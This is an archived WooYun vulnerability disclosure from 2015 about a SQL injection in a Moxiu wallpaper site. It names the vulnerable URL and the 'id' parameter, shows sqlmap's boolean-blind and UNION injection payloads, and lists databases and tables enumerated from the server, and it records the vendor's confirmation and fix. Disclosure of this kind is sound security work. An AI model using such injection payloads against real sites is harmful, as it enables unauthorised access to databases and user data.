乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-21: 细节已通知厂商并且等待厂商处理中 2015-03-23: 厂商已经确认,细节仅向厂商公开 2015-03-30: 厂商已经修复漏洞并主动公开,细节向公众公开
魔秀某站注入点可跨库,大量信息侧漏
问题出现在这个站点上面http://wallpaper-sogou.open.moxiu.net/http://wallpaper-sogou.open.moxiu.net/index.php?do=Album.Show&id=20170
sqlmap identified the following injection points with a total of 281 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: do=Album.Show&id=20170' AND 2186=2186 AND 'OLmM'='OLmM Vector: AND [INFERENCE] Type: UNION query Title: MySQL UNION query (20) - 3 columns Payload: do=Album.Show&id=-4491' UNION ALL SELECT 10,CONCAT(0x716a626a71,0x757948776a554d684766,0x71706b7a71),10# Vector: UNION ALL SELECT 10,[QUERY],10#---
1、数据库、系统信息
2、数据库用户+密码
3、数据库数据信息
Database: coop_diy+-------------+---------+| Table | Entries |+-------------+---------+| theme_queue | 49198 |+-------------+---------+Database: coop_diy_mxt_project+-------------------+---------+| Table | Entries |+-------------------+---------+| mxt_project | 230570 || project_statistic | 144104 || mxt_theme_queue | 1 |+-------------------+---------+Database: coop_new+-----------+---------+| Table | Entries |+-----------+---------+| coop_log | 10 || coop_user | 1 |+-----------+---------+Database: diy2_stat_platform+--------------+---------+| Table | Entries |+--------------+---------+| platformlogs | 57 || packinfos | 3 |+--------------+---------+Database: goodthemelist+-------+---------+| Table | Entries |+-------+---------+| list | 174503 |+-------+---------+Database: imoxiu_mocase+------------+---------+| Table | Entries |+------------+---------+| apps | 21326 || image_logs | 11662 || orders | 5643 || notice | 48 || active | 28 || settings | 1 |+------------+---------+Database: imoxiu_mocase_test+-------------+---------+| Table | Entries |+-------------+---------+| image_logs | 1458 || orders | 671 || client_logs | 31 || notice | 23 || active | 4 || apps | 3 || settings | 1 |+-------------+---------+Database: iphone_stat+---------------+---------+| Table | Entries |+---------------+---------+| livencounts | 803233 || phoneinfos | 68483 || channelcounts | 65625 || usercounts | 12054 || feedbacks | 814 |+---------------+---------+Database: list_diy+-------+---------+| Table | Entries |+-------+---------+| lists | 1016 |+-------+---------+Database: mx_android_stat+--------------+---------+| Table | Entries |+--------------+---------+| phoneinfos | 680014 || livencounts | 20295 || installs | 11327 || uptimecounts | 3547 || curhomes | 881 |+--------------+---------+Database: mx_apps_prize+------------+---------+| Table | Entries |+------------+---------+| `user` | 236 || prizeasign | 52 || prizeAdr | 2 || active | 1 |+------------+---------+Database: mx_diy_android+------------------+---------+| Table | Entries |+------------------+---------+| phonetypelog | 87 || user_archive_log | 48 || projectlog | 22 || userlog | 3 |+------------------+---------+Database: mx_mobile+-------------+---------+| Table | Entries |+-------------+---------+| topic_theme | 168 || notice | 30 || topic | 16 |+-------------+---------+Database: mx_screen+-----------------+---------+| Table | Entries |+-----------------+---------+| mx_fodder | 503 || mx_thumb | 503 || mx_comment | 31 || mx_fodder_theme | 14 |+-----------------+---------+Database: mx_wallpaper2+----------------+---------+| Table | Entries |+----------------+---------+| wp_log_view | 7073985 || wp_log_down | 1300039 || wp_log_apply | 613810 || wp_log_onekey | 372756 || wp_log_fav | 60193 || wp_items | 50092 || wp_comment | 43801 || wp_items_copy2 | 34180 || wp_items_copy | 19706 || wp_items_test | 16232 || wp_items_new2 | 14721 || wp_item | 9058 || wp_album | 1197 || wp_log_stat | 793 || wp_widget | 500 || wp_notice | 321 || wp_tag | 99 || wp_cates | 44 || wp_social | 7 || test | 1 |+----------------+---------+Database: MXT_Kaqiu+-------------------+---------+| Table | Entries |+-------------------+---------+| themeToHuaWeiFtp | 16987 || MXT_Theme_Project | 4597 || mxt_material2 | 276 || `user` | 1 |+-------------------+---------+Database: mysql+---------------+---------+| Table | Entries |+---------------+---------+| help_relation | 993 || help_topic | 506 || help_keyword | 452 || help_category | 38 || `user` | 12 || db | 10 |+---------------+---------+Database: repack_diy+-------------+---------+| Table | Entries |+-------------+---------+| mxt_project | 51501 || repacks | 31291 |+-------------+---------+Database: stat_android+---------------+---------+| Table | Entries |+---------------+---------+| livencounts | 244 || uptimecounts | 24 || phoneinfos | 15 || installs | 14 || curhomes | 11 || channels | 5 || setupdates | 2 || channelcounts | 1 |+---------------+---------+
Database: mx_admin+-------------------------+---------+| Table | Entries |+-------------------------+---------+| ad_audit_record | 1617775 || android_weather | 40980 || ad_edmail | 38202 || ad_log | 10317 || ad_audit_allocate | 9790 || ad_violate_uid | 4110 || ad_user_blacklist | 2831 || ad_audit_stat | 2738 || ad_audit_theme | 1581 || ad_censor | 1492 || ad_theme_week | 1011 || ad_theme_second | 723 || ad_theme_search_down | 482 || ad_theme_day | 414 || ad_stat | 263 || ad_inspect_stat | 242 || ad_user_verify | 230 || ad_user_week | 230 || android_data_log | 211 || ad_auth_log | 206 || ad_inspect_schedule | 164 || ad_auth_user_log | 134 || ad_auth_theme_audit | 119 || ad_theme_digest | 109 || ad_commend_day | 108 || android_theme_allocated | 95 || ad_comment | 88 || ad_blog | 69 || ad_theme_week_android | 55 || android_rmd_soft | 54 || ad_auth_theme | 50 || ad_portal_friendlinks | 50 || ad_soft_package | 44 || ad_chinamobile | 33 || android_topic | 33 || ad_user_space | 26 || ad_tags | 24 || ad_auth_user | 23 || android_home | 23 || mobile_ad | 22 || ad_portal_bannar | 18 || mobile_search_fail | 10 || mobile_cate_img | 9 || ad_theme_week_symbian | 8 || ad_commend_week_android | 4 || android_notice | 4 || android_theme_reserve | 4 || ad_commend_week_symbian | 3 || ad_audit_rule | 1 || mobile_ad_rule | 1 |+-------------------------+---------+
Database: mx_admin_v3+---------------------------+---------+| Table | Entries |+---------------------------+---------+| ad_audit_record | 1618961 || ad_log | 32775 || ad_audit_allocate | 10125 || ad_violate_uid | 4146 || ad_user_verify | 4050 || ad_audit_theme | 3145 || ad_audit_stat | 2738 || ad_censor | 1496 || ad_feed | 1082 || ad_auth_mood | 697 || ad_user_imgs | 520 || ad_auth_theme_audit | 350 || ad_inspect_stat | 242 || ad_album_global_rmd | 239 || ad_rec_mxstar | 220 || ad_auth_album | 217 || ad_auth_log | 216 || ad_theme_second | 182 || ad_rec_theme | 133 || ad_comment | 88 || ad_rec_mood | 82 || ad_friendlinks | 74 || ad_album_rmd | 73 || ad_auth_theme | 68 || ad_theme_digest | 66 || ad_tags | 57 || ad_delete_theme | 52 || ad_user_record | 46 || ad_rec_mood_gather | 37 || ad_admin | 30 || ad_portal_bannar | 24 || ad_auth_user | 23 || ad_admintype | 17 || ad_portal_albumbannar | 15 || ad_rec_theme_gather | 14 || ad_album_cate | 13 || ad_bannar | 12 || ad_client_qqmobilebannar | 12 || ad_portal_albumbannar_new | 12 || ad_spec | 6 || ad_spec_cat | 6 || ad_portal_bannar_new | 5 || ad_auth_user_log | 3 || ad_audit_rule | 1 |+---------------------------+---------+
你们比我更专业
危害等级:高
漏洞Rank:20
确认时间:2015-03-23 10:08
感谢
2015-03-30:已修复
